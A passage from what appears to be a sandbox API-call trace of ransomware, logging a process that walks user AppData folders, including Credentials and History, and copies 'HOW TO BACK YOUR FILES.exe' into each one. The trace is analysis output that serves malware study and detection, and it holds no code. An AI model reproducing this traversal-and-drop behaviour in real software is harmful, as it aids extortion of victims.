lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ" [0111.126] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ" [0111.126] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.126] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.127] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.127] GetLastError () returned 0x0 [0111.128] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.128] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6cddfd40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6cddfd40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.128] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7" [0111.128] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7" [0111.128] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.128] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.130] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.130] GetLastError () returned 0x0 [0111.130] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.130] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6ce05ea0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6ce05ea0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.131] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR" [0111.131] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR" [0111.131] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.131] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.132] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.132] GetLastError () returned 0x0 [0111.132] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.132] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6ce05ea0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6ce05ea0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.132] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds" [0111.133] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds" [0111.133] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.133] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.133] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.134] GetLastError () returned 0x0 [0111.134] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.134] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6ce2c000, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6ce2c000, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.134] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0111.134] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0111.134] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.135] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.135] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.135] GetLastError () returned 0x0 [0111.136] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.136] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4dd1ee20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dd1ee20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.136] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" [0111.136] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" [0111.136] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.136] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.137] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.137] GetLastError () returned 0x0 [0111.137] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.137] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6ce52160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6ce52160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.138] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~" [0111.138] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~" [0111.138] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.138] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.139] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.139] GetLastError () returned 0x0 [0111.139] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.139] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6ce9e420, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6ce9e420, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.140] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Event Viewer", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Event Viewer") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Event Viewer" [0111.140] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Event Viewer" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Event Viewer") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Event Viewer" [0111.140] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.140] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Event Viewer\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\event viewer\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.140] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.141] GetLastError () returned 0x0 [0111.141] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.141] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Event Viewer\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x32121370, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x4dd44f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dd44f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.141] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Credentials", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Credentials") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Credentials" [0111.142] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Credentials" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Credentials") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Credentials" [0111.142] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.142] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Credentials\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\credentials\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.142] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.143] GetLastError () returned 0x0 [0111.143] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.143] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Credentials\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4dd44f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dd44f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.143] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History" [0111.143] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History" [0111.143] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.143] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\history\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.144] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.145] GetLastError () returned 0x0 [0111.145] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.145] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6cec4580, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6cec4580, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.145] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\Low", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\Low") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\Low" [0111.146] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\Low" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\Low") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\Low" [0111.146] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.146] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\Low\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\history\\low\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.146] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.147] GetLastError () returned 0x0 [0111.147] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.147] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS 